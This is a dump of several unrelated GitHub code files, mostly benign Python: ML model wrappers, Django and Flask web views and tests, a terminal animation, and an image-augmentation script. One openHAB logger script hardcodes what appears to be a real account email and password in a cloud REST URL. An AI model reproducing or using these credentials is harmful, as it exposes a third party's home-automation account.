-> list:\n return [xx for xx in x]\n \n def _init_model(self):\n self._model = TSNE(\n n_components=self._model_settings['n_components'],\n perplexity=self._model_settings['perplexity'],\n early_exaggeration=self._model_settings['early_exaggeration'],\n learning_rate=self._model_settings['learning_rate'],\n random_state=0, # debug,\n metric=self._model_settings['metric'],\n init=True\n )\n \n def fit(self, x_train:list, y_train:list, x_val:list, y_val:list):\n self._init_model()\n x_train, y_train = self._format(x_train, y_train)\n self._model.fit(x_train, y_train)\n self._fold += 1\n \n def predict(self, x:list) -> list:\n x_predict = self._format_features(x)\n return self._model.predict(x_predict)\n \n def predict_proba(self, x:list) -> list:\n x_predict = self._format_features(x)\n probs = self._model.predict_proba(x_predict)\n if len(probs[0]) != self._n_classes:\n preds = self._model.predict(x_predict)\n probs = self._inpute_full_prob_vector(preds, probs)\n return probs\n \n def save(self):\n path = '../experiments/' + self._experiment_root + '/' + self._experiment_name + '/models/'\n os.makedirs(path, exist_ok=True)\n path += self._name + '_l' + self._settings['data']['adjuster']['limit'] + '_f' + str(self._fold) + '.pkl'\n with open(path, 'wb') as fp:\n pickle.dump(self, fp)\n return path\n \n def get_path(self, fold:int) -> str:\n path = '../experiments/' + self._experiment_root + '/' + self._experiment_name + '/models/'\n path += self._name + '_l' + str(self._settings['data']['adjuster']['limit']) + '_f' + str(fold) + '.pkl'\n return path\n \n def save_fold(self, fold: int) -> str:\n path = '../experiments/' + self._experiment_root + '/' + self._experiment_name + '/models/'\n os.makedirs(path, exist_ok=True)\n path += self._name + '_l' + str(self._settings['data']['adjuster']['limit']) + '_f' + str(fold) + '.pkl'\n with open(path, 'wb') as fp:\n pickle.dump(self, fp)\n return path","repo_name":"epfl-ml4ed/beerslaw-lab","sub_path":"src/ml/models/modellers/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37752347104","text":"# This file is part of LibreOsteo.\n#\n# LibreOsteo is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# LibreOsteo is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with LibreOsteo. If not, see .\n# -*- coding: utf-8 -*-\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom rest_framework.test import APIRequestFactory, force_authenticate\nfrom django.contrib.auth import get_user_model\nfrom libreosteoweb.models import Patient, Examination, TherapeutSettings, OfficeSettings, Invoice\nfrom libreosteoweb.api.views import ExaminationViewSet, PatientViewSet\nfrom datetime import datetime\nfrom django.utils import timezone\nfrom libreosteoweb.api.receivers import (block_disconnect_all_signal,\n receiver_examination,\n temp_disconnect_signal,\n receiver_newpatient)\nfrom django.db.models import signals\n\n\nclass TestDeletePatient(APITestCase):\n def setUp(self):\n receivers_senders = [(receiver_examination, Examination),\n (receiver_newpatient, Patient)]\n with block_disconnect_all_signal(signal=signals.post_save,\n receivers_senders=receivers_senders):\n self.user = get_user_model().objects.create_superuser(\n \"test\", \"test@test.com\", \"testpw\")\n TherapeutSettings.objects.create(adeli=\"12345\",\n siret=\"12345\",\n user=self.user)\n setting = OfficeSettings.objects.get(id=1)\n setting.office_siret = \"12345\"\n setting.save()\n self.p1 = Patient.objects.create(family_name=\"Picard\",\n first_name=\"Jean-Luc\",\n birth_date=datetime(1935, 7, 13))\n self.p2 = Patient.objects.create(family_name=\"Bond\",\n first_name=\"James\",\n birth_date=datetime(1924, 1, 1))\n self.e1 = Examination.objects.create(date=timezone.now(),\n status=0,\n type=1,\n patient=self.p1)\n # Invoice the examination\n self.client.login(username='test', password='testpw')\n response = self.client.post(reverse('examination-close',\n kwargs={'pk': self.e1.pk}),\n data={\n 'status': 'invoiced',\n 'amount': 55,\n 'paiment_mode': 'cash',\n 'check': {}\n },\n format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_delete_patient_with_invoiced_examination(self):\n response = self.client.delete(\n reverse('patient-detail', kwargs={'pk': self.p1.pk}))\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)\n assert len(Patient.objects.filter(id=self.p1.pk)) == 1\n assert len(Examination.objects.filter(patient=self.p1)) == 1\n\n def test_delete_patient_without_examination(self):\n response = self.client.delete(\n reverse('patient-detail', kwargs={'pk': self.p2.pk}))\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n assert len(Patient.objects.filter(id=self.p2.pk)) == 0\n assert len(Examination.objects.filter(patient=self.p2)) == 0\n\n def test_delete_patient_with_invoiced_examination_gdpr(self):\n current_invoice = Examination.objects.filter(\n id=self.e1.pk)[0].invoices.latest('date')\n assert current_invoice is not None\n response = self.client.delete(\n reverse('patient-detail', kwargs={'pk': self.p1.pk}) +\n '?gdpr=True')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n assert len(Patient.objects.filter(id=self.p1.pk)) == 0\n assert len(Examination.objects.filter(id=self.e1.pk)) == 0\n assert len(Invoice.objects.filter(id=current_invoice.id)) == 1\n assert Invoice.objects.filter(\n id=current_invoice.id).first().patient_family_name == 'Picard'\n","repo_name":"libreosteo/LibreOsteo","sub_path":"libreosteoweb/tests/test_delete_patient.py","file_name":"test_delete_patient.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"81"} +{"seq_id":"37514666950","text":"import random\nfrom moviemon.util.data import GameData, load_session_data, save_session_data\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\n\nstate = {\n 'id': \"\",\n 'text': \"\",\n \"button-text\": \"🅰️ Throw the Ball 🅱️ Leave\",\n }\n\nclass Battle(TemplateView):\n template_name = 'battle.html'\n context = {}\n\n # 무비몬 잡을 확률을 알려주는 함수\n def calculate_percent(self, game, moviemon_id) -> int:\n # 50 - 무비몬 평점 * 10 + 플레이어 힘 * 5\n percent = 50 - game.moviemon[moviemon_id].rating * 10 + game.get_strength() * 5\n if percent < 1:\n percent = 1\n elif percent > 90:\n percent = 90\n return int(percent)\n\n def get(self, request, moviemon_id, key=None):\n\n # 게임 데이터를 불러온다\n game = GameData.load(load_session_data())\n key = request.GET.get('key', None)\n \n # Battle에서 출력할 텍스트의 기본값\n if moviemon_id not in game.captured_list:\n if moviemon_id != state['id']:\n state['text'] = \"A wild Moviemon is appeared !!\".format(game.moviemon[moviemon_id].title)\n state['button-text'] = \"🅰️ Throw the Ball 🅱️ Leave\"\n state['id'] = moviemon_id\n\n if key is not None:\n if key == 'a':\n if moviemon_id not in game.captured_list:\n\n # 만약 소지한 Ball의 갯수가 0 일 경우 무한 리다이렉트\n if game.ball_count < 1:\n state['text'] = \"You have no Ball . . .\"\n state[\"button-text\"] = \"🅱️ Continue\"\n return redirect(request.path)\n\n game.ball_count -= 1\n \n # 1 - 100 사이의 랜덤 수를 뽑아서 무비몬 잡을 확률 보다 낮으면 성공\n # ex) 무비몬 잡을 확률 : 30%, 랜덤 수(1 - 100) : 25 -> 성공\n if random.randint(1, 101) <= self.calculate_percent(game, moviemon_id):\n state['text'] = \"Gotcha !!\"\n state[\"button-text\"] = \"🅱️ Continue\"\n game.captured_list.append(moviemon_id)\n\n # 무비몬 잡을 확률보다 높으면 실패\n else:\n state['text'] = \"Oh, you missed it !\"\n\n save_session_data(game.dump())\n \n elif key == 'b':\n state[\"button-text\"] = \"🅱️ Continue\"\n save_session_data(game.dump())\n return redirect('worldmap')\n\n return redirect(request.path)\n\n self.context = {\n 'title': game.moviemon[moviemon_id].title,\n 'poster': game.moviemon[moviemon_id].poster,\n 'rating': int(game.moviemon[moviemon_id].rating),\n\n # get_strength() 함수에서 플레이어의 강함을 리턴해준다\n # 무비몬 한마리 잡을 때 마다 0.5씩 공격력이 올라간다\n 'power': int(game.get_strength()),\n\n 'ball': game.ball_count,\n 'text': state['text'],\n 'percent': self.calculate_percent(game, moviemon_id),\n 'button_text': state['button-text']\n }\n return render(request, self.template_name, self.context)","repo_name":"nfl1ryxditimo12/moviemon","sub_path":"moviemon/views/battle.py","file_name":"battle.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11637111734","text":"import random\n\ndef remove_duplicates(list_):\n new_list = []\n for i in list_:\n if i not in new_list:\n new_list.append(i)\n print('duplicates', len(list_)-len(new_list))\n return new_list\n\ndef make_slices(nb_data, nb_slices, zero=False):\n slice_len = nb_data//nb_slices\n if zero:\n slices = [i*slice_len for i in range(nb_slices)]\n else:\n slices = [i*slice_len for i in range(1, nb_slices)]\n slices.append(nb_data)\n return slices\n\n\ndef shuffle_dataset(dataset, seed=1):\n random.seed(seed)\n indices = list(range(len(dataset)))\n random.shuffle(indices)\n dataset_shuff = [dataset[i] for i in indices] \n return dataset_shuff","repo_name":"htrenquier/argument-based-explainer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39200430674","text":"\"\"\"Bouncing DVD Logo, by Al Sweigart al@inventwithpython.com\nA bouncing DVD logo animation. You have to be \"of a certain age\" to\nappreciate this. Press Ctrl-C to stop.\n\nNOTE: Do not resize the terminal window while this program is running.\nView the original code at https://nostarch.com/big-book-small-python-projects\nTags: short, artistic, bext\"\"\"\n\nimport sys, random, time\n\ntry:\n import bext\nexcept ImportError:\n print(\"\"\"This program requires the bext module, which you\n can install by following the instructions at\n https://pypi.org/project/Bext/\"\"\")\n sys.exit()\n\n# Set up the constants:\nWIDTH, HEIGHT = bext.size()\n# We can't print to the last column on Windows without it adding a\n# newline automatically, so reduce the width by one:\nWIDTH -= 1\n\nNUMBER_OF_LOGOS = 5\nPAUSE_AMOUNT = 0.2\n\nCOLORS = ['red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white']\n\nUP_RIGHT = 'ur'\nUP_LEFT = 'ul'\nDOWN_RIGHT = 'dr'\nDOWN_LEFT = 'dl'\nDIRECTIONS = (UP_RIGHT, UP_LEFT, DOWN_RIGHT, DOWN_LEFT)\n\n# Key names for logo dictionaries:\nCOLOR = 'color'\nX = 'x'\nY = 'y'\nDIR = 'direction'\n\nLOGO_TEXT = 'FLANCREST ENTERPRISES' # Sets Logo text\nLOGO_LENGTH = len(LOGO_TEXT) # Sets Logo length\n\n\ndef main():\n bext.clear()\n\n # Generate some logos.\n logos = []\n for i in range(NUMBER_OF_LOGOS):\n logos.append({COLOR: random.choice(COLORS),\n X: random.randint(1, WIDTH - (LOGO_LENGTH + 1)),\n Y: random.randint(1, HEIGHT - (LOGO_LENGTH + 1)),\n DIR: random.choice(DIRECTIONS)})\n if logos[-1][X] % 2 == 1:\n # Make sure X is even so it can hit the corner.\n logos[-1][X] -= 1\n\n corner_bounces = 0 # Count how many times a logo hits a corner.\n while True: # Main program loop.\n for logo in logos: # Handle each logo in the logos list.\n # Erase the logo's current location:\n bext.goto(logo[X], logo[Y])\n print(LOGO_LENGTH * ' ', end='')\n\n original_direction = logo[DIR]\n\n # See if the logo bounces off the corners:\n if logo[X] == 0 and logo[Y] == 0:\n logo[DIR] = DOWN_RIGHT\n corner_bounces += 1\n elif logo[X] == 0 and logo[Y] >= HEIGHT - 1:\n logo[DIR] = UP_RIGHT\n corner_bounces += 1\n elif logo[X] >= WIDTH - LOGO_LENGTH and logo[Y] == 0:\n logo[DIR] = DOWN_LEFT\n corner_bounces += 1\n elif logo[X] >= WIDTH - LOGO_LENGTH and logo[Y] >= HEIGHT - 1:\n logo[DIR] = UP_LEFT\n corner_bounces += 1\n\n # See if the logo bounces off the left edge:\n elif logo[X] == 0 and logo[DIR] == UP_LEFT:\n logo[DIR] = UP_RIGHT\n elif logo[X] == 0 and logo[DIR] == DOWN_LEFT:\n logo[DIR] = DOWN_RIGHT\n\n # See if the logo bounces off the right edge:\n # (WIDTH - 3 because 'DVD' has 3 letters.)\n elif logo[X] >= WIDTH - LOGO_LENGTH and logo[DIR] == UP_RIGHT:\n logo[DIR] = UP_LEFT\n elif logo[X] >= WIDTH - LOGO_LENGTH and logo[DIR] == DOWN_RIGHT:\n logo[DIR] = DOWN_LEFT\n\n # See if the logo bounces off the top edge:\n elif logo[Y] == 0 and logo[DIR] == UP_LEFT:\n logo[DIR] = DOWN_LEFT\n elif logo[Y] == 0 and logo[DIR] == UP_RIGHT:\n logo[DIR] = DOWN_RIGHT\n\n # See if the logo bounces off the bottom edge:\n elif logo[Y] >= HEIGHT - 1 and logo[DIR] == DOWN_LEFT:\n logo[DIR] = UP_LEFT\n elif logo[Y] >= HEIGHT - 1 and logo[DIR] == DOWN_RIGHT:\n logo[DIR] = UP_RIGHT\n\n if logo[DIR] != original_direction:\n # Change color when the logo bounce:\n logo[COLOR] = random.choice(COLORS)\n\n # Move the logo. (X moves by 2 because the terminal\n # characters are twice as tall as they are wide.)\n if logo[DIR] == UP_RIGHT:\n logo[X] += 2\n logo[Y] -= 1\n elif logo[DIR] == UP_LEFT:\n logo[X] -= 2\n logo[Y] -= 1\n elif logo[DIR] == DOWN_RIGHT:\n logo[X] += 2\n logo[Y] += 1\n elif logo[DIR] == DOWN_LEFT:\n logo[X] -= 2\n logo[Y] += 1\n\n # Display number of corner bounces:\n bext.goto(5, 0)\n bext.fg('white')\n print('Corner bounces:', corner_bounces, end='')\n\n for logo in logos:\n # Draw the logos at their new location:\n bext.goto(logo[X], logo[Y])\n bext.fg(logo[COLOR])\n print(LOGO_TEXT, end='')\n\n bext.goto(0, 0)\n\n sys.stdout.flush() # Required for bext-using programs.\n time.sleep(PAUSE_AMOUNT)\n\n\n# If this program was run (instead of imported), run the animation:\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print()\n print('Bouncing DVD Logo, by Al Sweigart')\n sys.exit() # When Ctrl-C is pressed, end the program.\n","repo_name":"joshuagladwin/The-Big-Book-of-Small-Python-Projects","sub_path":"Projects/Project #05 Bouncing DVD Logo/bouncingdvd.py","file_name":"bouncingdvd.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"10575963051","text":"from django.urls import re_path\nfrom .views import products, collections, errors\n\nurlpatterns = [\n re_path(r'^products/?$', products.products),\n re_path(r'^product/(?P\\w+)/?$', products.product),\n re_path(r'^collections/?$', collections.all_collections),\n re_path(r'^collection/(?P\\w+)/products/?$', products.products_by_collect),\n re_path(r'.', errors.error404),\n]\n\n","repo_name":"mercutiy/django","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44611699236","text":"from flask import render_template, redirect, request, url_for, session, flash\nfrom sqlalchemy import select\nfrom flask_login import login_required, current_user\nfrom datetime import datetime\n\nfrom app.forms import forms\nfrom app import models\nfrom app.utils import authenticators\nimport app.utils.formatters as formatters\nimport app.utils.messengers as messengers\n\nfrom app import db\nfrom app.routes.event import bp\n\n# =======================================\n# Event\n# =======================================\n\n\n# View event\n@bp.route(\"/campaigns/-/event/-\", methods=[\"GET\", \"POST\"])\ndef view_event(campaign_name, campaign_id, event_name, event_id):\n\n event = db.session.execute(\n select(models.Event)\n .filter_by(id=event_id)).scalar()\n \n campaign = event.parent_campaign\n\n # Format belligerents data\n belligerents = event.separate_belligerents() \n\n form = forms.CommentForm()\n delete_form = forms.SubmitForm()\n\n # Set scroll_to target for back button\n session[\"timeline_scroll_target\"] = f\"event-{event.id}\"\n\n # Check if new comment submitted\n if form.validate_on_submit():\n \n # Check user is a member of the campaign\n authenticators.check_membership(campaign)\n\n # Create new comment\n comment = models.Comment()\n comment.update(form=request.form,\n parent_event=event,\n author=current_user)\n\n # Create new comment notification\n messengers.send_comment_notification(sender=current_user,\n recipients=campaign.members,\n campaign=campaign,\n event=event)\n\n return redirect(url_for('event.view_event', \n campaign_name=campaign.url_title,\n campaign_id=campaign.id, \n event_name=event.url_title,\n event_id=event.id))\n\n return render_template(\"event_page.html\", \n event=event, \n campaign=campaign, \n belligerents=belligerents,\n form=form,\n delete_form=delete_form)\n\n\n# Add new event\n@bp.route(\"/campaigns/-/event/new-event\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_event(campaign_name, campaign_id):\n\n campaign = db.session.execute(\n select(models.Campaign)\n .filter_by(id=campaign_id)).scalar()\n\n authenticators.permission_required(campaign)\n\n # Check if date argument given\n if \"date\" in request.args:\n # Get date arguments\n datestring = request.args[\"date\"]\n args = request.args\n # Increase the date by one unit and format the datestring\n datestring = formatters.increment_datestring(datestring, args)\n # Create placeholder event\n event = models.Event()\n event.create_blank(datestring)\n # Prepopulate form\n form = forms.CreateEventForm(obj=event)\n\n # Otherwise, create default empty form\n else:\n form = forms.CreateEventForm()\n\n # Check if user has submitted a new event\n if form.validate_on_submit():\n # Create new event object using form data\n event = models.Event()\n event.update(form=form.data,\n parent_campaign=campaign,\n new=True)\n # Update \"following_event\" relationships for all events\n campaign.get_following_events()\n # Check all epochs for events\n campaign.check_epochs()\n # Create notification message\n messengers.send_event_notification(current_user,\n recipients=campaign.members,\n campaign=campaign,\n event=event)\n\n # Set scroll_to target for back button\n session[\"timeline_scroll_target\"] = f\"event-{event.id}\"\n\n return redirect(url_for(\"campaign.edit_timeline\",\n campaign_name=campaign.url_title,\n campaign_id=campaign.id))\n\n # Flash form errors\n for field_name, errors in form.errors.items():\n for error_message in errors:\n flash(field_name + \": \" + error_message)\n\n return render_template(\"new_event.html\", \n form=form, \n campaign=campaign)\n\n\n# Edit existing event\n@bp.route(\"/campaigns/-/event/-/edit\", methods=[\"GET\", \"POST\"])\n@login_required\ndef edit_event(campaign_name, campaign_id, event_name, event_id):\n\n campaign = db.session.execute(\n select(models.Campaign)\n .filter_by(id=campaign_id)).scalar()\n \n # Check if the user has permissions to edit the target campaign.\n authenticators.permission_required(campaign)\n\n event = db.session.execute(\n select(models.Event)\n .filter_by(id=event_id)).scalar()\n\n if event:\n # Set scroll_to target for back button\n session[\"timeline_scroll_target\"] = f\"event-{event.id}\"\n\n form = forms.CreateEventForm(obj=event)\n delete_form = forms.SubmitForm()\n\n if form.validate_on_submit():\n # Update event object using form data\n event.update(form=form.data, \n parent_campaign=campaign)\n\n # Update \"following_event\" relationships for all events\n campaign.get_following_events()\n\n # Update all epochs\n campaign.check_epochs()\n\n return redirect(url_for(\"campaign.edit_timeline\", \n campaign_name=campaign.url_title,\n campaign_id=campaign.id))\n\n # Change form label to 'update'\n form.submit.label.text = 'Update Event'\n\n # Flash form errors\n for field_name, errors in form.errors.items():\n for error_message in errors:\n flash(field_name + \": \" + error_message)\n\n return render_template(\"new_event.html\",\n campaign=campaign,\n campaign_name=campaign.url_title,\n event_name=event.url_title,\n form=form,\n delete_form=delete_form,\n event=event,\n edit=True)\n\n\n# Delete existing event\n@bp.route(\"/campaigns/-/event/-/delete\", methods=[\"POST\"])\n@login_required\ndef delete_event(campaign_name, campaign_id, event_name, event_id):\n\n campaign = db.session.execute(\n select(models.Campaign)\n .filter_by(id=campaign_id)).scalar()\n \n event = db.session.execute(\n select(models.Event)\n .filter_by(id=event_id)).scalar()\n\n # Check if the user has permissions to edit the target campaign.\n authenticators.permission_required(campaign)\n\n campaign.last_edited = datetime.now()\n\n db.session.delete(event)\n db.session.commit()\n\n # Update \"following_event\" relationships for all events\n campaign.get_following_events()\n\n # Update campaigns epochs\n campaign.check_epochs()\n\n return redirect(url_for(\"campaign.edit_timeline\",\n campaign_name=campaign.url_title,\n campaign_id=campaign.id))\n\n\n# Delete comment\n@bp.route(\"/campaigns/-/event/-/comment//delete\", methods=[\"POST\"])\n@login_required\ndef delete_comment(campaign_name, campaign_id, event_name, event_id, comment_id):\n \n target_comment_id = comment_id\n\n campaign = db.session.execute(\n select(models.Campaign)\n .filter_by(id=campaign_id)).scalar()\n \n event = db.session.execute(\n select(models.Event)\n .filter_by(id=event_id)).scalar()\n \n comment = db.session.execute(\n select(models.Comment)\n .filter_by(id=target_comment_id)).scalar()\n\n # Check if it is the comment author who is deleting the comment\n if comment.author == current_user:\n authenticators.check_membership(campaign)\n else:\n # Check if the user has permissions to edit the target campaign.\n authenticators.permission_required(campaign)\n\n # Check if comment -> event -> campaign relationship is valid\n if comment in event.comments and event in campaign.events:\n # Delete the comment\n db.session.delete(comment)\n db.session.commit()\n\n return redirect(url_for('event.view_event', \n campaign_name=campaign.url_title,\n campaign_id=campaign.id, \n event_name=event.url_title,\n event_id=event.id))\n","repo_name":"Ozzletroll/WAR-COR","sub_path":"app/routes/event/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38590050845","text":"# -*- coding: utf-8 -*-\nimport logging\nimport os\nfrom pathlib import Path\n\nimport hydra\nimport kornia\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom dotenv import find_dotenv, load_dotenv\nfrom kornia.augmentation import ImageSequential\nfrom omegaconf import OmegaConf\nfrom PIL import Image\nfrom torchvision import transforms\n\n\n# from tests.test_data import test_traindata_length\ndef getImagesAndLabels(input_filepath: Path):\n \"\"\"\n Takes a path as input and returns all images(PNG and JPG) in path\n \"\"\"\n image_path = list(input_filepath.glob(\"**/*.png\")) + list(\n input_filepath.glob(\"**/*.jpg\")\n )\n # All path to images\n non_segmented_images = [img for img in image_path if \"GT\" not in str(img)]\n labels_non_segment = [img.parts[-2] for img in non_segmented_images]\n\n # All fish classes\n classes = list(set(labels_non_segment))\n print(f\"Available Classes: {classes}\")\n\n int_classes = {fish: i for i, fish in enumerate(classes)}\n lables = [int_classes[lable] for lable in labels_non_segment]\n\n # Label Dictionary\n print(int_classes)\n\n uniqlabels = list(set(lables))\n\n return non_segmented_images, lables, uniqlabels, int_classes\n\n\ndef get_params(cfg: OmegaConf):\n \"\"\"\n Returns all parameters in config file\n \"\"\"\n input_filepath = f\"{cfg.paths.input_filepath}\"\n output_filepath = f\"{cfg.paths.output_filepath}\"\n input_filepath = Path(input_filepath)\n\n return input_filepath, output_filepath\n\n\n@hydra.main(config_name=\"dataset_conf.yaml\", config_path=\"../../conf\")\ndef main(cfg: OmegaConf):\n \"\"\"Runs data processing scripts to turn raw data from (input_filepath : ../raw)\n into cleaned data ready to be analyzed (saved in ../processed).\n \"\"\"\n\n input_filepath, output_filepath = get_params(cfg)\n\n # Check if path exists else raise error\n if not os.path.exists(input_filepath):\n raise ValueError(\"Input path does not exist\")\n if not os.path.exists(output_filepath):\n raise ValueError(\"Output path does not exist\")\n\n non_segmented_images, labels, uniqLabels, int_classes = getImagesAndLabels(\n input_filepath\n )\n\n # Saving in a DataFrame\n image_data = pd.DataFrame({\"Path\": non_segmented_images, \"labels\": labels})\n\n convert_tensor = transforms.Compose(\n [transforms.Resize((64, 64)), transforms.ToTensor()]\n )\n\n aug_list = ImageSequential(\n # kornia.color.BgrToRgb(),\n kornia.augmentation.ColorJitter(0.2, 0.0, 0.0, 0.0, p=1.0),\n kornia.augmentation.RandomAffine(360, p=1.0),\n kornia.augmentation.RandomPerspective(0.1, p=0.8),\n kornia.augmentation.RandomHorizontalFlip(p=0.5),\n )\n\n for label in uniqLabels:\n class_name = list(int_classes.keys())[list(int_classes.values()).index(label)]\n print(class_name)\n dir_exist = os.path.exists(f\"{output_filepath}{class_name}\")\n if not dir_exist:\n os.mkdir(f\"{output_filepath}{class_name}\")\n counter = 0\n for im in image_data[image_data.labels == label].Path:\n print(im)\n img = Image.open(im)\n img_tensor = convert_tensor(img).unsqueeze(0).repeat(10, 1, 1, 1)\n out = aug_list(img_tensor)\n for i in range(10):\n image = out[i].numpy().transpose((1, 2, 0))\n plt.imsave(f\"{output_filepath}{class_name}\\im{counter}{i}.png\", image)\n counter += 1\n\n\nif __name__ == \"__main__\":\n log_fmt = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # not used in this stub but often useful for finding various files\n project_dir = Path(__file__).resolve().parents[2]\n\n # find .env automagically by walking up directories until it's found, then\n # load up the .env entries as environment variables\n load_dotenv(find_dotenv())\n\n main()\n","repo_name":"koldbrandt/mlops_fuzzy-fish-waffle","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28581956871","text":"import requests\nimport sys\nimport pandas\nimport time\nfrom datetime import datetime\nimport openhab_data_access\n\nSleep_time = 30 # Frequency of data to be collected in seconds\nNo_of_Data_samples = 30 # No of data samples required with a frequency of Sleep_time\ndatabase = pandas.read_csv('~/Work/pycharm_projects/REST_API_database_2', low_memory=False)\n# Opening csv file using pandas\n\nprint(\"working\")\n\n# openhab cloud REST API URL syntax https://:@home.myopenhab.org/rest/items\ncloud_api_url = \"https://praeklima.tud%40gmail.com:praeklima_tud@2021@home.myopenhab.org/rest/items/\"\nlocalhost_url = \"http://192.168.3.1:8080/rest/items/\"\n# Column names for the database\n# column = ['date', 'time', 'localCurrentTemperature', 'localCurrentApparentTemperature', 'LocalForecastedTemperature_3',\n# 'LocalForecastedApparentTemperature_3', 'LocalForecastedTemperature_6',\n# 'LocalForecastedApparentTemperature_6', 'localCurrentHumidity', 'LocalForecastedHumidity_3',\n# 'LocalForecastedHumidity_6', 'LocalCurrent_Cloudiness', 'LocalForecastedCloudiness_3',\n# 'LocalForecastedCloudiness_6', 'localCurrentUVIndex', 'LocalCurrent_Rain', 'LocalForecastedRain_3',\n# 'LocalForecastedRain_6',\n# 'LocalCurrent_Snow', 'LocalForecastedSnow_3', 'LocalForecastedSnow_6', 'SensorTemperature',\n# 'SensorRelativeHumidity', 'SensorUltraviolet', 'SensorLuminance', 'MotionAlarm', 'TamperAlarm',\n# 'WallPlugSwitch_Switch_1', 'WallPlugSwitch_SensorPower_1', 'Multisensor_outside_SensorTemperature',\n# 'Multisensor_outside_SensorRelativeHumidity', 'Multisensor_outside_SensorUltraviolet',\n# 'Multisensor_outside_SensorLuminance',\n# 'Multisensor_outside_TamperAlarm', 'Multisensor_outside_MotionAlarm', 'sensor1_temperature',\n# 'sensor2_temperature', 'sensor3_temperature', 'sensor4_temperature', 'sensor5_temperature',\n# 'sensor1_humidity', 'sensor2_humidity', 'sensor3_humidity', 'sensor4_humidity', 'sensor5_humidity']\n\ncolumn = ['date', 'time', 'localCurrentTemperature', 'localCurrentApparentTemperature', 'LocalForecastedTemperature_3',\n 'LocalForecastedApparentTemperature_3', 'LocalForecastedTemperature_6',\n 'LocalForecastedApparentTemperature_6', 'localCurrentHumidity', 'LocalForecastedHumidity_3',\n 'LocalForecastedHumidity_6', 'LocalCurrent_Cloudiness', 'LocalForecastedCloudiness_3',\n 'LocalForecastedCloudiness_6', 'localCurrentUVIndex', 'LocalCurrent_Rain', 'LocalForecastedRain_3',\n 'LocalForecastedRain_6',\n 'LocalCurrent_Snow', 'LocalForecastedSnow_3', 'LocalForecastedSnow_6', 'SensorTemperature',\n 'SensorRelativeHumidity', 'SensorUltraviolet', 'SensorLuminance', 'MotionAlarm', 'TamperAlarm',\n 'WallPlugSwitch1_Switch_1', 'WallPlugSwitch1_SensorPower_1','Multisensor_outside_SensorTemperature',\n 'Multisensor_outside_SensorRelativeHumidity', 'Multisensor_outside_SensorUltraviolet', 'Multisensor_outside_SensorLuminance',\n 'Multisensor_outside_TamperAlarm', 'Multisensor_outside_MotionAlarm']\n\nrow_data = []\ndata = []\ncount = 0\n\nopenhab_data_access.openhab_read_data(localhost_url, column[22])\n\nwhile True: # infinite loop\n now = datetime.now()\n row_data = [now.strftime(\"%Y-%m-%d\"), now.strftime(\"%H:%M:%S\")] # time stamp for data collection\n for i in range(2, len(column)):\n value = openhab_data_access.openhab_read_data(localhost_url, column[i])\n if 1 < i < 8 or i == 21 or i == 29: # Removing units from the data\n value = value[:len(value) - 4]\n elif 14 < i < 21:\n value = value[:len(value) - 3]\n elif 7 < i < 14:\n value = value[:len(value) - 2]\n row_data.append(value)\n count = count + 1\n data.append(row_data)\n print(row_data)\n time.sleep(Sleep_time)\n # print(count)\n sys.stdout.write(\"\\r\")\n print(count, end='', flush=True)\n if count == No_of_Data_samples:\n time.sleep(1)\n sys.stdout.write(\"\\r\")\n count = 0\n # print(data)\n df = pandas.DataFrame(data, columns=column) # Creating a Pandas database for current data\n # print(df)\n database = database.append(df, ignore_index=True) # appending new data to the main REST_API_database\n # print(database)\n database.to_csv('~/Work/pycharm_projects/REST_API_database_2', index=False) # Converting it into csv file\n data = []\n\n","repo_name":"Jaswanth1729/Praeklima_fassade","sub_path":"Software_files/Rest_API_database.py","file_name":"Rest_API_database.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41881621015","text":"#!/usr/bin/env python3\n######\n# @author: Ana Nieto,\n# @email: nieto@lcc.uma.es\n# @institution: University of Malaga\n# @country: Spain\n# @website: https://www.linkedin.com/in/ana-nieto-72b17718/\n######\n\nimport genera as gd\nimport forense as fo\nimport random\nimport warnings\nimport re\nimport os\nimport sys\nfrom argparse import ArgumentParser\nimport json\nfrom stegano import lsb\n\n\n#-----------------------------------\n# 